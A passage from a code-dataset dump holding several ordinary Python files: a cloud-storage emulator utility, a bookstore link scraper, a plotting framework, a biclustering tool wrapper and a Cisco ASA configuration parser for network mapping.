deleted_keys.add(\"items.owner\")\n elif simplfied_key.startswith(\"acl\"):\n deleted_keys.add(\"acl\")\n elif simplfied_key.startswith(\"items.acl\"):\n deleted_keys.add(key[0 : key.find(\"acl\") + len(\"acl\")])\n elif simplfied_key.startswith(\"defaultObjectAcl\"):\n deleted_keys.add(\"defaultObjectAcl\")\n elif simplfied_key.startswith(\"items.defaultObjectAcl\"):\n deleted_keys.add(\n key[0 : key.find(\"defaultObjectAcl\") + len(\"defaultObjectAcl\")]\n )\n else:\n maybe_delete = True\n if fields is not None:\n if maybe_delete:\n for field in fields:\n if simplfied_key.startswith(field):\n maybe_delete = False\n break\n if maybe_delete:\n deleted_keys.add(key)\n proxy = scalpl.Cut(response)\n print(\"delete: \", deleted_keys)\n for key in deleted_keys:\n del proxy[key]\n return proxy.data\n\n\n# === RESPONSE === #\n\n\ndef extract_projection(request, default, context):\n if context is not None:\n return request.projection if request.projection != 0 else default\n else:\n projection_map = [\"noAcl\", \"full\"]\n projection = request.args.get(\"projection\")\n return (\n projection if projection in projection_map else projection_map[default - 1]\n )\n","sub_path":"google/cloud/storage/emulator/utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"328948953","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 10 15:04:09 2021\r\n\r\n@author: linn2\r\n\"\"\"\r\n\r\nimport requests\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\n\r\nurl = 'https://www.books.com.tw/web/sys_saletopb/books/'\r\ndata = requests.get(url)\r\nsoup = BeautifulSoup(data.text)\r\n\r\na_tag = soup.find_all('a')\r\n\r\nfor tag in a_tag:\r\n url = tag['href']\r\n \r\n if re.fullmatch('https://www.books.com.tw/web/sys_saletopb/books/(\\d{2})/[?]loc=P_0002_(\\d{3})', url): \r\n print(url)\r\n \r\n \r\n\r\n\r\n\r\n","sub_path":"class4-2.py","file_name":"class4-2.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"289104080","text":"#!/usr/bin/env python3\n#pylint: disable=C0103,W0201,W0702,R1710,R1702,too-many-instance-attributes\n\"\"\"A matplotlib based python plot framework\"\"\"\nfrom __future__ import absolute_import\nimport 
os\nimport warnings\nimport json\nimport logging\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nfrom .kitdata import KITData\nfrom .KITConfig import KITConfig\nfrom .kitmatplotlib import KITMatplotlib\nfrom .kitlodger import KITLodger\n\nclass KITPlot():\n \"\"\"The framework's main class that handles the data input and top level\n organization of the plotting.\n\n Args:\n - cfg (str): Path to existing cfg file that contains plot parameters\n - defaultCfg (str): Path to existing cfg file that is used as a\n blueprint for creating a new cfg file\n \"\"\"\n def __init__(self, **kwargs):\n self.log = logging.getLogger(__class__.__name__)\n self.log.setLevel(logging.DEBUG)\n if self.log.hasHandlers() is False:\n format_string = '%(asctime)s - %(levelname)s - %(name)s - %(message)s'\n formatter = logging.Formatter(format_string)\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(formatter)\n self.log.addHandler(console_handler)\n self.log.info(\"KITPlot initialized...\")\n\n # ignore warning that is raised because of back-end bug while using 'waitforbuttonpress'\n warnings.filterwarnings(\"ignore\", \".*GUI is implemented.*\")\n\n self.iter = iter([\"lodger1\", \"lodger2\", \"lodger3\"])\n\n # init lists\n self.__files = []\n self.__graphs = []\n # Load parameters from cfg file or load default cfg\n cfg = kwargs.get('cfg', None)\n defaultCfg = kwargs.get('defaultCfg', None)\n self.auto_labeling = kwargs.get('auto_labeling', True)\n self.opt_reset = kwargs.get('reset_legend', None)\n self.opt_split = kwargs.get('split_graph', None)\n self.base_name = kwargs.get('name', None)\n if kwargs.get('old_db', False):\n self.new_db = False\n else:\n self.new_db = True\n if cfg is not None:\n self.__cfg = KITConfig(cfg)\n else:\n self.__cfg = KITConfig()\n self.__cfg.Dir(\"cfg\")\n if defaultCfg is None:\n self.__cfg.Default()\n else:\n self.__cfg.Default(defaultCfg)\n self.__inputName = None\n self.name_lst = None\n self.canvas = None\n\n #####################\n ### Graph methods ###\n #####################\n\n def addFiles(self, dataInput=None, name=None, name_lst=None):\n \"\"\" Depending on the type, the 'self.__files' list is filled with\n KITData objects. An integer represents a single probe ID. 
A string\n represents a .txt file or a folder path.\n A RPunch measurement, however, origionaly consist of one KITData file\n that needs to be split up into several KITData objects since one bias\n value (x value) represents one graph.\n\n Args:\n dataInput(None|int|str): Determines the way the 'self.__files'\n is filled.\n measurement(str): probe station and ALiBaVa measurements must be\n handled differently due to different database paramters\n name (str): specified name of the measured item for plot legend\n name_lst (list): if there are multiple items that need to be named\n \"\"\"\n if self.base_name is True:\n self.__inputName = dataInput\n self.base_name = None\n return True\n # extract name from data input\n if name is None and self.__inputName is None:\n self.__inputName = self.getDataName(dataInput)\n if name is not None and self.__inputName is None:\n self.__inputName = name\n if name_lst is not None:\n self.name_lst = name_lst\n if self.opt_split:\n self.name_lst, dataInput = self.__split_data(dataInput)\n\n # load dict with plot parameters or create one if not present\n self.__cfg.load(self.__inputName)\n\n if self.__cfg['General', 'Measurement'] == \"probe\":\n # Load KITData\n if isinstance(dataInput, KITData):\n self.log.info(\"Input interpreted as KITData object\")\n self.__files.append(dataInput)\n # self.addGraph(dataInput.getX(),dataInput.getY())\n\n # Load json file\n elif check_json(dataInput):\n self.log.info(\"Input interpreted as json file\")\n for graph_data in convert_json(dataInput):\n self.__files.append(\n KITData(\n (\n graph_data[\"x\"],\n graph_data[\"y\"],\n graph_data[\"z\"],\n graph_data[\"ex\"],\n graph_data[\"ey\"],\n graph_data[\"ez\"]\n ),\n new_db=self.new_db\n )\n )\n\n\n # Load list/tuple with raw data or list with PIDs\n elif isinstance(dataInput, (list, tuple)):\n if all([isinstance(elem, int) for elem in dataInput]):\n self.log.info(\"Input interpreted as list with multiple PIDs\")\n else:\n self.log.info(\"Input interpreted as raw data\")\n for i, tup in enumerate(dataInput):\n self.__files.append(KITData(tup, new_db=self.new_db))\n try:\n self.__files[-1].setName(self.name_lst[i])\n except:\n pass\n\n # Load single integer PID\n elif isinstance(dataInput, int):\n self.__files.append(KITData(dataInput))\n\n elif isinstance(dataInput, str):\n # Load single string PID\n if dataInput.isdigit():\n kdata = KITData(dataInput, new_db=self.new_db)\n self.log.info(\"Input interpreted as single PID\")\n self.__files.append(kdata)\n\n # Load multiple data files in a folder\n elif os.path.isdir(dataInput):\n self.log.info(\"Input interpreted as folder with files\")\n for i, inputFile in enumerate(os.listdir(dataInput)):\n if os.path.splitext(inputFile)[1] == \".txt\" \\\n or os.path.splitext(inputFile)[1] == \".yml\":\n self.__files.append(\n KITData(dataInput + inputFile,\n self.new_db)\n )\n try:\n self.__files[-1].setName(self.name_lst[i])\n except:\n pass\n else:\n pass\n\n # Load file\n elif os.path.isfile(dataInput):\n # multiple PIDs\n if checkPID(dataInput) is True:\n self.log.info(\"Input interpreted as file with PID(s)\")\n with open(dataInput) as inputFile:\n fileList = []\n for i, line in enumerate(inputFile):\n entry = line.split()\n if entry[0].isdigit():\n fileList.append(\\\n KITData(dataInput=entry[0],\n measurement=self.__cfg['General', 'Measurement'],\n new_db=self.new_db))\n try:\n fileList[-1].setName(self.name_lst[i])\n except:\n pass\n # if measurement == \"probe\":\n self.__files = fileList\n # elif measurement == \"alibava\":\n # 
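# probe measurements keep one KITData object per PID line; the commented
                        # alibava branch below once bundled them into a single KITData
                        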
self.__files.append(KITData(fileList))\n\n # single file\n else:\n self.log.info(\"Input interpreted as single file\")\n self.__files.append(KITData(dataInput))\n try:\n self.__files[-1].setName(self.name_lst[0])\n except:\n pass\n\n # new feature: multiple PIDs in argument\n elif any(n in dataInput for n in [\"[\", \"]\", \"(\", \")\"]):\n entry = dataInput.replace(\"[\", \"\").replace(\"]\", \"\")\\\n .replace(\"(\", \"\").replace(\")\", \"\").split(\",\")\n if all([n.isdigit() for n in entry]):\n self.log.info(\"Input interpreted as argument with \"\n \"multiple PIDs\")\n for pid in entry:\n kdata = KITData(pid, new_db=self.new_db)\n self.__files.append(kdata)\n\n\n return True\n\n\n def draw(self, dataInput=None):\n \"\"\"Searches for the cfg file, loads plot parameters, creates canvas, graphs\n and lodgers.\n \"\"\"\n # create graphs and canvas\n if dataInput is None:\n self.canvas, self.ax = KITMatplotlib(\n self.__cfg,\n self.check_if_new_cfg(self.__cfg.getDir(),\n self.__inputName))\\\n .draw(self.__files, reset=self.opt_reset)\n else:\n self.canvas, self.ax = KITMatplotlib(\n self.__cfg,\n self.check_if_new_cfg(\n self.__cfg.getDir(), self.__inputName)).draw(\n dataInput, reset=self.opt_reset)\n\n # check if there are lodgers in cfg and if so, add them to plot\n self.getLodgers()\n\n return True\n\n def showCanvas(self, save=None):\n \"\"\"Make the canvas pop up\"\"\"\n if self.canvas:\n if save is True:\n self.saveCanvas()\n plt.draw()\n plt.waitforbuttonpress(0)\n plt.close()\n else:\n self.log.info(\"There is no canvas to show\")\n return True\n\n def saveCanvas(self):\n \"\"\"Saves the output as png and pdf files\"\"\"\n png_out = os.path.join(\"output\", self.__inputName) + \".png\"\n pdf_out = os.path.join(\"output\", self.__inputName) + \".pdf\"\n self.canvas.savefig(png_out)\n self.canvas.savefig(pdf_out)\n return True\n\n######################\n### Lodger methods ###\n######################\n\n def getLodgers(self):\n \"\"\" Read the cfg and create a lodger object for every entry in\n 'Lodgers'.\"\"\"\n try:\n for lodger in self.__cfg['Lodgers']:\n paraDict = dict(self.__cfg['Lodgers'][lodger])\n x = paraDict.get('x', None)\n y = paraDict.get('y', None)\n name = paraDict.get('name', None)\n color = paraDict.get('color', None)\n width = paraDict.get('width', None)\n style = paraDict.get('style', None)\n text = paraDict.get('text', None)\n fontsize = paraDict.get('fontsize', None)\n alpha = paraDict.get('alpha', None)\n opt_dict = paraDict.get('opt_dict', dict())\n\n\n self.addLodger(self.canvas, x=x, y=y, name=name, color=color,\n style=style, width=width, text=text,\n fontsize=fontsize, alpha=alpha,\n opt_dict=opt_dict)\n except ValueError as err:\n self.log.error(err)\n except:\n pass\n\n\n def addLodger(self, fig, **kwargs):\n \"\"\"Create a new Lodger object and add it to the canvas\"\"\"\n newLodger = KITLodger(fig, **kwargs)\n self.canvas = newLodger.add_to_plot()\n newLodger.add_to_cfg(self.__cfg)\n\n return True\n\n def get_fit(self, data_lst, data_opt=\"pointwise\", fit_opt=\"linear\",\n returns=\"fit\", residual=False, name=None):\n \"\"\"Fits data points. 
'data_lst' is expected to be a list containing list\n elements with list(x) and list(y) values.\n Args:\n - data_lst = [[[x1], [y1]], [[x2], [y2]], [[x3], [y3]], ...]\n Returns:\n Data points (x-list, y-list) for fit graph\n \"\"\"\n if data_opt == \"standard\":\n x = data_lst[0]\n y = data_lst[1]\n if data_opt == \"pointwise\":\n x = [tup[0][0] for tup in data_lst]\n y = [tup[1][0] for tup in data_lst]\n if data_opt == \"listwise\":\n x = data_lst[0]\n y = data_lst[1]\n if fit_opt == \"linear\":\n m, b, _, _, err = stats.linregress(x, y)\n if name is None and residual is False:\n self.log.info(\"Fit result:::(m = %s, y0 = %s)\", str(m), str(b))\n if name is None and residual is True:\n self.log.info(\"Fit result:::(m = %s, y0 = %s, res = %s)\",\n str(m), str(b), str(err))\n if name is not None and residual is False:\n self.log.info(\"Fit result[%s]:::(m = %s, y0 = %s)\",\n name, str(m), str(b))\n if name is not None and residual is True:\n self.log.info(\"Fit result[%s]:::(m = %s, y0 = %s, res = %s)\",\n name, str(m), str(b), str(err))\n if min(x) == 0:\n steps = max(x)*1.1/8\n else:\n steps = min(x)/2\n t = np.arange(min(x), max(x)*1.1, steps)\n f = m * t + b\n if returns == \"fit\":\n return (list(f), list(t))\n if returns == \"result\":\n try:\n return (m, b, err)\n except:\n return (m, b)\n\n\n\n###################\n### Get methods ###\n###################\n\n\n def getGraph(self, graph=None):\n\n if len(self.__graphs) == 1:\n return self.__graphs[0]\n elif (len(self.__graphs) != 1) and (graph is None):\n return self.__graphs\n else:\n if isinstance(graph, str):\n if len(self.__graphs) != 1 and graph.isdigit():\n return self.__graphs[int(graph)]\n else:\n return False\n elif isinstance(graph, int):\n if len(self.__graphs) != 1:\n return self.__graphs[graph]\n else:\n return False\n\n def getFile(self, KITFile=None):\n\n if len(self.__files) == 1:\n return self.__files[0]\n elif len(self.__files) != 1 and KITFile is None:\n return self.__files\n else:\n if isinstance(KITFile, str):\n if len(self.__files) != 1 and KITFile.isdigit():\n return self.__files[int(KITFile)]\n else:\n return False\n elif isinstance(KITFile, int):\n if len(self.__files) != 1:\n return self.__files[KITFile]\n else:\n return False\n\n def getAxis(self):\n if self.ax is None:\n return None\n return self.ax\n\n def getCanvas(self):\n if self.canvas is None:\n return None\n return self.canvas\n\n def getX(self):\n X = []\n for List in self.__files:\n X.append(List.getX())\n return X\n\n def getY(self):\n Y = []\n for List in self.__files:\n Y.append(List.getY())\n return Y\n\n def getDataName(self, dataInput):\n \"\"\"Check data input and try to extract the name for legend, cfg and\n output file\"\"\"\n if dataInput is None:\n self.log.info(\"No data input. Name not extractable.\")\n return None\n if isinstance(dataInput, str):\n name = os.path.splitext(os.path.basename(os.path.normpath(str(dataInput))))[0]\n self.log.info(\"Extracted name from data input: %s\", name)\n return name\n elif isinstance(dataInput, int):\n self.log.info(\"Data input interpreted as PID. 
Name is PID.\")\n return str(dataInput)\n else:\n raise ValueError(\"Unknown case in 'getDataName' function\")\n\n def check_if_new_cfg(self, path, name):\n \"\"\"If cfg is new (no cfg present yet) return True, else False\"\"\"\n if self.auto_labeling is False:\n return False\n if os.path.isfile(os.path.join(path, name + \".cfg\")) is True:\n return False\n return True\n\n def __split_data(self, data_input):\n name_lst = []\n line_data = []\n try:\n with open(data_input, \"r\") as data:\n for line in data:\n splitted = line.split()\n name_lst.append(splitted[0])\n try:\n line_data.append(\n (\n [float(splitted[1])],\n [float(splitted[2])],\n [float(splitted[3])],\n [float(splitted[4])]\n )\n )\n except IndexError:\n line_data.append(\n (\n [float(splitted[1])],\n [float(splitted[2])],\n [0],\n [0]\n )\n )\n return name_lst, line_data\n except: #pylint:disable=bare-except\n self.log.error(\"Error while trying to split up the data...\")\n return [], data_input\n\ndef checkPID(dataInput):\n \"\"\"Checks if PIDs are listed in the file\"\"\"\n if os.path.isfile(dataInput):\n with open(dataInput) as inputFile:\n first_line = inputFile.readline()\n if len(first_line.split()) == 1 \\\n and first_line[0].isdigit():\n return True\n return False\n else:\n raise ValueError(\"Input is not a file.\")\n\n\ndef check_json(dataInput):\n try:\n if os.path.isfile(dataInput):\n if os.path.splitext(dataInput)[1] == \".json\":\n return True\n except TypeError:\n pass\n return False\n\ndef convert_json(dataInput):\n valid_keys = [\"x\", \"y\", \"z\", \"ex\", \"ey\", \"ez\"]\n with open(dataInput, \"r\") as stream:\n data = json.load(stream)\n if isinstance(data, dict):\n data = [data]\n stream.close()\n\n for dic in data:\n graph_data = {\"x\": [], \"y\": [], \"z\": [], \"ex\": [], \"ey\": [],\n \"ez\": [], \"name\": None}\n for key in dic:\n if key in valid_keys:\n graph_data[key] = dic[key]\n yield graph_data\n","sub_path":"kitplot.py","file_name":"kitplot.py","file_ext":"py","file_size_in_byte":19219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"231377977","text":"####################################################################\n### ____ _ ____ _ ###\n### | __ )(_) __ ) ___ _ __ ___| |__ ###\n### | _ \\| | _ \\ / _ \\ '_ \\ / __| '_ \\ ###\n### | |_) | | |_) | __/ | | | (__| | | | ###\n### |____/|_|____/ \\___|_| |_|\\___|_| |_| ###\n### ###\n###--------------------------------------------------------------###\n### ###\n### This file is part of the BiBench package for biclustering ###\n### analysis. ###\n### ###\n### Copyright (c) 2011 by: ###\n### * Kemal Eren, ###\n### * Mehmet Deveci, ###\n### * Umit V. Catalyurek ###\n### ###\n###--------------------------------------------------------------###\n### ###\n### For license info, please see the README and LICENSE files ###\n### in the main directory. 
###\n### ###\n###--------------------------------------------------------------###\n\n\"\"\"Coalesce algorithm wrapper for finding biclusters with up- and down-regulated TFs.\"\"\"\nimport os, subprocess\n\nfrom bibench.algorithms.wrapper import wrapper_helper\nfrom bibench.bicluster import \\\n Bicluster, BiclusterList, bicluster_algorithm\nfrom bibench.datasets import io\nimport bibench.util as util\n\nBINARY = 'COALESCE'\n\n@bicluster_algorithm\ndef coalesce(data,\n geneModuleProbability=0.95,\n conditionPvalueThreshold=0.05,\n conditionZThreshold=0.5,\n normalize=False):\n \"\"\"\n Wrapper for the COALESCE binary.\n\n Args:\n * data: numpy.ndarray\n * geneModuleProbability: the probability threshold for including\n genes in a regulatory module.\n * conditionPvalueThreshold: the P-value threshold for including\n conditions in a regulatory module.\n * conditionZThreshold: the Z-score threshold for including\n conditions in a regulatory module.\n * normalize: whether to normalize the data.\n\n Returns:\n A list of biclusters.\n\n \"\"\"\n if normalize is False:\n normalize = 0\n else:\n normalize = 1\n kwargs = locals()\n return wrapper_helper(BINARY,\n _write_dataset_,\n _read_results_,\n _do_call_,\n **kwargs)\n\n\ndef _do_call_(data, datafile, results_dir, **kwargs):\n \"\"\"Executes the COALESCE binary with the given parameters\"\"\"\n\n command = \"{binary} -i {0}\" \\\n \" -p {geneModuleProbability}\" \\\n \" -c {conditionPvalueThreshold}\" \\\n \" -C {conditionZThreshold}\".format(datafile, binary=BINARY, **kwargs)\n\n if kwargs[\"normalize\"] != 0:\n command += \" -e \"\n\n stndout = os.path.join(results_dir, \"bic.out\")\n stnderr = os.path.join(results_dir, \"debug.out\")\n\n with open(stndout, 'w') as out:\n with open(stnderr, 'w') as err:\n subprocess.check_call(command.split(), stdout=out, stderr=err)\n\n\ndef _read_results_(dirname, data):\n \"\"\"\n Read the result file which is bic.out and returns the list of\n bicluster objects.\n\n \"\"\"\n bicOut = os.path.join(dirname, \"bic.out\")\n f = open(bicOut,'r')\n\n biclusters = []\n for clusterLine, geneLine, conditionLine, motifLine in util.grouper(f, 4):\n bic = _createBicluster_(geneLine, conditionLine, data)\n biclusters.append(bic)\n f.close()\n return biclusters\n\n\ndef _createBicluster_(geneLine, conditionLine, data):\n \"\"\"\n Extracts the rows and columns of the bicluster from the given gene\n and condition line\n\n \"\"\"\n genes = map(int, geneLine.split('\\t')[1:])\n conditions = map(int, conditionLine.split('\\t')[1:])\n return Bicluster(genes, conditions, data)\n\n\ndef _write_dataset_(data, filename):\n \"\"\"Writes a dataset to a PCL-format file, as expected by COALESCE.\"\"\"\n io.write_pcl_dataset(data, filename)\n","sub_path":"bibench/algorithms/coalesce.py","file_name":"coalesce.py","file_ext":"py","file_size_in_byte":4485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"342730551","text":"#########################################################################\n# #\n# This file is a Python parser module for PGT Network Map and is #\n# written to parse the configuration on Cisco ASA devices. #\n# #\n# You may not use this file without a valid PGT Enterprise license. 
#\n# You may not duplicate or create derivative work from this script #\n# without a valid PGT Enterprise license #\n# #\n# Copyright Laszlo Frank (c) 2014-2019 #\n# #\n#########################################################################\nimport clr\nclr.AddReferenceToFileAndPath(\"PGTInterfaces.dll\")\nclr.AddReferenceToFileAndPath(\"PGTNetworkMap.dll\")\nclr.AddReferenceToFileAndPath(\"Common.dll\")\nimport System\nimport L3Discovery\nimport PGT.Common\nimport re\nfrom System.Diagnostics import DebugEx, DebugLevel\nfrom System.Net import IPAddress\nfrom L3Discovery import NeighborProtocol\nfrom PGT.Common import IPOperations\n# last changed : 2019.04.09\nscriptVersion = \"0.0.1\"\nclass CiscoASA(L3Discovery.IRouter):\n # Beyond _maxRouteTableEntries only the default route will be queried\n _maxRouteTableEntries = 30000 \n _defaultRoutingInstanceName = \"\"\n def __init__(self):\n # The device version info string\n self._versionInfo = None\n # The device inventory string\n self._inventory = None\n # HostName\n self._hostName = None\n # Number of member in a stack\n self._stackCount = 0\n # Not supported by IOS, return default only\n self._logicalSystems = [\"Default\"]\n # The dictionary of RoutingInstances keyed by LogicalSystem name\n self._routingInstances = {}\n # The routing protocols run by this router, dictionary keyed by routing instamce name\n self._runningRoutingProtocols = {} \n # The current PGT settings \n self.ScriptSettings = PGT.Common.SettingsManager.GetCurrentScriptSettings()\n # The ModelNumber calculated from Inventory\n self._ModelNumber = None\n # The SystemSerial calculated from Inventory\n self._SystemSerial = None \n # Describes the current operation\n self._operationStatusLabel = \"Idle\"\n # The RouterIDCalculator object\n self._ridCalculator = RouterIDCalculator(self)\n # The InterfaceParser object\n self._interfaceParser = InterfaceParser(self)\n \n \n def GetHostName(self):\n \"\"\" Returns the host bane as a string\"\"\"\n if not self._hostName : self._hostName = Session.GetHostName()\n return self._hostName\n \n def GetInventory(self):\n \"\"\"Returns the device inventory string\"\"\"\n if not self._inventory : \n self._inventory = Session.ExecCommand(\"show inventory\")\n return self._inventory\n \n def GetLogicalSystemNames(self):\n \"\"\" Returns the list of Logical Systems as a string list\"\"\"\n return self._logicalSystems\n \n def GetManagementIP(self):\n \"\"\"Returns the management ip address as a string\"\"\"\n return ConnectionInfo.DeviceIP\n \n def GetModelNumber(self):\n \"\"\"Returns Model number as a string, calculated from Inventory\"\"\"\n if not self._ModelNumber :\n mn = \"\"\n inv = self.GetInventory()\n models = re.findall(r\"(?<=DESCR:).*\", inv)\n if len(models) >= 1:\n self._ModelNumber = models[0].strip('\"')\n else:\n self._ModelNumber = \"n/a\"\n return self._ModelNumber\n \n def GetOperationStatusLabel(self):\n \"\"\"Returns a string describibg current activity\"\"\"\n return self._operationStatusLabel\n \n def GetPlatform(self):\n \"\"\"Return a string\tto describe device Platform\"\"\"\n return \"ASA\"\n \n def GetSession(self):\n \"\"\"Returns the actual Session object\"\"\"\n return Session\n \n def GetStackCount(self):\n \"\"\"Returns the number of members in a switch stack\"\"\"\n return 1\n \n def GetSupportTag(self):\n \"\"\"Returns a string describing capability of this instance\"\"\"\n global scriptVersion\n return \"Cisco Adaptive Security Appliance support module - Python Parser v{0}\".format(scriptVersion)\n \n 
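# The serial number below is parsed from the first \"SN: \" entry found in \"show inventory\" output.\n 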
def GetSystemSerial(self):\n \"\"\"Returns System serial numbers as a string, calculated from Inventory\"\"\"\n if not self._SystemSerial :\n # check inventory for serial numbers\n inv = self.GetInventory()\n SNs = re.findall(r\"(?<=SN: ).*\", inv, re.IGNORECASE)\n if len(SNs) > 0 :\n self._SystemSerial = SNs[0]\n return self._SystemSerial\n \n def GetDeviceType(self):\n \"\"\"Returns Type string that can be Switch, Router or Firewall, depending on Model\"\"\"\n return \"Firewall\"\n \n def GetVendor(self):\n \"\"\"Must return a string matching the Vendor name this parser is responible for\"\"\"\n return \"Cisco-ASA\"\n \n def GetVersion(self):\n \"\"\"Must return device version string \t\"\"\"\n if not self._versionInfo:\n self._versionInfo = Session.ExecCommand(\"show version\")\n return self._versionInfo\n \n def ActiveProtocols(self, instance):\n \"\"\"Returns the list of NeighborProtocols running on the requested routing instance \"\"\"\n defaultInstanceName = L3Discovery.RoutingInstance.DefaultInstanceName(self.GetVendor())\n instanceName = defaultInstanceName\n if instance : instanceName = instance.Name\n if self._runningRoutingProtocols.get(instanceName, None) == None:\n self._runningRoutingProtocols[instanceName] = []\n if len(self._runningRoutingProtocols[instanceName]) == 0 :\n # // -- check running routing protocols\n cmd = \"show ip protocols\"\n if instanceName != defaultInstanceName : \n cmd = \"show ip protocols vrf {0}\".format(instanceName)\n response = str.lower(Session.ExecCommand(cmd));\n \n mathcedProtocolNames = []\n matches = re.finditer(r\"(?<=routing protocol is ).([a-z]{0,99})\", response, re.MULTILINE | re.IGNORECASE)\n for matchNum, match in enumerate(matches, start=1):\n for groupNum in range(0, len(match.groups())):\n groupNum = groupNum + 1 \n mathcedProtocolNames.append(match.group(groupNum)) \n supportedProtocols = System.Enum.GetValues(clr.GetClrType(L3Discovery.NeighborProtocol))\n for thisProtocol in supportedProtocols :\n if str(thisProtocol).lower() in mathcedProtocolNames : \n # In case we are checking the global routing instance. 
we must perform further checks\n # because \"show ip protocols\" reports all protocols across all VRFs unfortunately\n if instanceName == defaultInstanceName : \n if thisProtocol == L3Discovery.NeighborProtocol.BGP:\n b = Session.ExecCommand(\"show ip bgp summary\")\n if b : self._runningRoutingProtocols[ instanceName ].Add(thisProtocol)\n elif thisProtocol == L3Discovery.NeighborProtocol.OSPF:\n o = Session.ExecCommand(\"show ip ospf neighbor\")\n if o : self._runningRoutingProtocols[ instanceName ].Add(thisProtocol)\n elif thisProtocol == L3Discovery.NeighborProtocol.EIGRP:\n e = Session.ExecCommand(\"show ip eigrp neighbor\")\n if e : self._runningRoutingProtocols[ instanceName ].Add(thisProtocol)\n elif thisProtocol == L3Discovery.NeighborProtocol.RIP:\n e = Session.ExecCommand(\"show ip rip neighbor\")\n if e : self._runningRoutingProtocols[ instanceName ].Add(thisProtocol)\n else:\n self._runningRoutingProtocols[ instanceName ].Add(thisProtocol)\n \n # STATIC \n cmd = \"show ip route static\"\n if instanceName != defaultInstanceName:\n cmd = \"show ip route vrf {0} static\".format(instanceName)\n response = Session.ExecCommand(cmd); \n if response : \n self._runningRoutingProtocols[instance.Name].append(NeighborProtocol.STATIC) \n \n \n #\n # CDP/LLDP - Apparently, Cisco does not want to implement CDP / LLDP on ASA\n #\n # VPN - supporting L2L IPSec\n if instanceName == defaultInstanceName:\n ipsecTunnels = Session.ExecCommand(\"show vpn-sessiondb summary | i IPsec\")\n numbers = GetRegexGroupMatches(r\"\\s(\\d+)\", ipsecTunnels, 1)\n if len(numbers) > 0 and int(numbers[0]) > 0 :\n self._runningRoutingProtocols[instanceName].Add(NeighborProtocol.IPSEC)\n pass \n \n result = self._runningRoutingProtocols[instanceName]\n return result\n \n def BGPAutonomousSystem(self, instance):\n \"\"\"Returns the BGP AN number for the requested routing instance\"\"\"\n return self._ridCalculator.GetBGPASNumber(instance)\n \n def GetInterfaceByName(self, interfaceName, instance):\n \"\"\"Returns the RouterInterface object for the requested interface name\"\"\"\n return self._interfaceParser.GetInterfaceByName(interfaceName, instance)\n \n def GetInterfaceConfiguration(self, routerInterface):\n \"\"\"Return a boolean value if sucessfully updated the Configuration of the routerInterface object specified\"\"\"\n try: \n routerInterface.Configuration = self._interfaceParser.GetInterfaceConfiguration(routerInterface.Name)\n return True\n except:\n return False\n \n def GetInterfaceNameByIPAddress(self, address, instance):\n \"\"\"Returns the name of the interface specified by ip address\"\"\"\n return self._interfaceParser.GetInterfaceNameByAddress(address, instance)\n \n def Initialize(self, session):\n \"\"\"Return a boolean value indicating whether the current instance is capable of handling the device connected in session\"\"\"\n # Session global variable will always contain the actual session, therefore we don't need to\n # keep a referecnce to the session vsariable passed over here\n self._defaultRoutingInstanceName = L3Discovery.RoutingInstance.DefaultInstanceName(self.GetVendor())\n v = self.GetVersion()\n return \"adaptive security appliance\" in v.lower()\n \n def RegisterNHRP(self, neighborRegistry, instance):\n \"\"\"Collects NHRP protocol information and registers it with Network Discovery Engine\"\"\"\n # neighborRegistry :The NetworkRegistry object\n # instance :The Routing instance reference\n # \n # Sample input for parsing\n #\n #GigabitEthernet0/0/1 - Group 44\n # State is Active\n #\t 
5 state changes, last state change 4w4d\n # Virtual IP address is 10.81.0.1\n # Active virtual MAC address is 0000.0c07.ac2c(MAC In Use)\n #\t Local virtual MAC address is 0000.0c07.ac2c(v1 default)\n # Hello time 1 sec, hold time 3 sec\n #\t Next hello sent in 0.256 secs\n # Authentication text, string \"ROWVA252\"\n # Preemption enabled, delay min 60 secs\n # Active router is local\n # Standby router is 10.81.0.3, priority 100 (expires in 3.040 sec)\n # Priority 105 (configured 105)\n #\t\t\tTrack object 1 state Up decrement 10\n # Group name is \"hsrp-Gi0/0/1-44\" (default)\n VIPAddress = \"\"\n GroupID = \"\"\n PeerAddress = \"\"\n isActive = False\n ri = None\n hsrpSummary = Session.ExecCommand(\"show standby\")\n for thisLine in hsrpSummary.splitlines():\n try:\n indentLevel = len(thisLine) - len(thisLine.lstrip(' '))\n if indentLevel == 0:\n # interface definition is changing\n if GroupID and VIPAddress :\n neighborRegistry.RegisterNHRPPeer(self, instance, ri, L3Discovery.NHRPProtocol.HSRP, isActive, VIPAddress, GroupID, PeerAddress)\n VIPAddress = \"\"\n GroupID = \"\"\n PeerAddress = \"\"\n ri = None\n # -- \n words = filter(None, thisLine.split(\" \"))\n if len(words) >= 3 :\n ifName = words[0]\n ri = self.GetInterfaceByName(ifName, instance)\n match = re.findall(r\"(?<=Group )\\d{0,99}\", thisLine, re.IGNORECASE)\n if len(match) == 1 : GroupID = words[2]\n continue\n if ri :\n l = thisLine.lower().lstrip()\n if l.startswith(\"virtual ip address is\") :\n match = re.findall(r\"\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b\", l, re.IGNORECASE)\n if len(match) == 1 : VIPAddress = match[0]\n continue\n if l.startswith(\"active router is local\") :\n isActive = True\n continue\n if l.startswith(\"standby router is\") :\n match = re.findall(r\"\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b\", l, re.IGNORECASE)\n if len(match) == 1 : PeerAddress = match[0]\n continue\n except Exception as Ex:\n message = \"CiscoASA Router Module Error : could not parse NHRP information <{0}> because : {1} \".format(thisLine, str(Ex))\n DebugEx.WriteLine(message)\n \n # -- register the last one\n if ri and VIPAddress and GroupID :\n neighborRegistry.RegisterNHRPPeer(self, instance, ri, L3Discovery.NHRPProtocol.HSRP, isActive, VIPAddress, GroupID, PeerAddress) \n \n\n \n \n def Reset(self):\n \"\"\"Resets all instance variables to its default value\"\"\"\n self._versionInfo = 